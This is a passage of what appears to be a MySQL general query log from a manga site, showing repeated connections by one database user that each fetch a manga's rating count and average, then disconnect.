mangauser@localhost on u317079482_mangacherri_2 using Socket 330649005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330649005 Quit 330649006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330649006 Quit 330649007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330649007 Quit 330649008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330649008 Quit 330649009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330649009 Quit 330649010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330649010 Quit 330649011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330649011 Quit 330649012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330649012 Quit 330649013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330649013 Quit 330649014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330649014 Quit 330649015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330649015 Quit 330649016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330649016 Quit 330649017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330649017 Quit 330649018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330649018 Quit 330649019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330649019 Quit 330649020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330649020 Quit 330649021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330649021 Quit 330649022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330649022 Quit 330649023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330649023 Quit 330649024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330649024 Quit 330649025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330649025 Quit 330649026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330649026 Quit 330649027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330649027 Quit 330649028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330649028 Quit 330649029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330649029 Quit 330649030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330649030 Quit 330649031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330649031 Quit 330649032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330649032 Quit 330649033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330649033 Quit 330649034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330649034 Quit 330649035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330649035 Quit 330649036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330649036 Quit 330649037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330649037 Quit 330649038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330649038 Quit 330649039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330649039 Quit 330649040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330649040 Quit 330649041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330649041 Quit 330649042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330649042 Quit 330649043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330649043 Quit 330649044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330649044 Quit 330649045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330649045 Quit 330649046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330649046 Quit 330649047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330649047 Quit 330649048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330649048 Quit 330649049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330649049 Quit 330649050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330649050 Quit 330649051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330649051 Quit 330649052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330649052 Quit 330649053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330649053 Quit 330649054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330649054 Quit 330649055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330649055 Quit 330649056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330649056 Quit 330649057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330649057 Quit 330649058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330649058 Quit 330649059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330649059 Quit 330649060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330649060 Quit 330649061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330649061 Quit 330649062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330649062 Quit 330649063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330649063 Quit 330649064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330649064 Quit 330649065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330649065 Quit 330649066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330649066 Quit 330649067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330649067 Quit 330649068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330649068 Quit 330649069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330649069 Quit 330649070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330649070 Quit 330649071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330649071 Quit 330649072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330649072 Quit 330649073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330649073 Quit 330649074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330649074 Quit 330649075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330649075 Quit 330649076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330649076 Quit 330649077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330649077 Quit 330649078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330649078 Quit 330649079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330649079 Quit 330649080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330649080 Quit 330649081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330649081 Quit 330649082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330649082 Quit 330649083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330649083 Quit 330649084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330649084 Quit 330649085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330649085 Quit 330649086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330649086 Quit 330649087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330649087 Quit 330649088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330649088 Quit 330649089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330649089 Quit 330649090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330649090 Quit 330649091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330649091 Quit 330649092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330649092 Quit 330649093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330649093 Quit 330649094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330649094 Quit 330649095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330649095 Quit 330649096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330649096 Quit 330649097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330649097 Quit 330649098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330649098 Quit 330649099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330649099 Quit 330649100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330649100 Quit 330649101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330649101 Quit 330649102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330649102 Quit 330649103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330649103 Quit 330649104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330649104 Quit 330649105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330649105 Quit 330649106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330649106 Quit 330649107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330649107 Quit 330649108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330649108 Quit 330649109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330649109 Quit 330649110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330649110 Quit 330649111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330649111 Quit 330649112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330649112 Quit 330649113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330649113 Quit 330649114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330649114 Quit 330649115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330649115 Quit 330649116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330649116 Quit 330649117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330649117 Quit 330649118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330649118 Quit 330649119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330649119 Quit 330649120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330649120 Quit 330649121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330649121 Quit 330649122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330649122 Quit 330649123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330649123 Quit 330649124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330649124 Quit 330649125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330649125 Quit 330649126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330649126 Quit 330649127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330649127 Quit 330649128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330649128 Quit 330649129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330649129 Quit 330649130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330649130 Quit 330649131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330649131 Quit 330649132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330649132 Quit 330649133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330649133 Quit 330649134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330649134 Quit 330649135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330649135 Quit 330649136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330649136 Quit 330649137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330649137 Quit 330649138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330649138 Quit 330649139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330649139 Quit 330649140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330649140 Quit 330649141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330649141 Quit 330649142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330649142 Quit 330649143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330649143 Quit 330649144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330649144 Quit 330649145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330649145 Quit 330649146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330649146 Quit 330649147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330649147 Quit 330649148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330649148 Quit 330649149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330649149 Quit 330649150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330649150 Quit 330649151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330649151 Quit 330649152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330649152 Quit 330649153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330649153 Quit 330649154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330649154 Quit 330649155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330649155 Quit 330649156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330649156 Quit 330649157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330649157 Quit 330649158 Connect 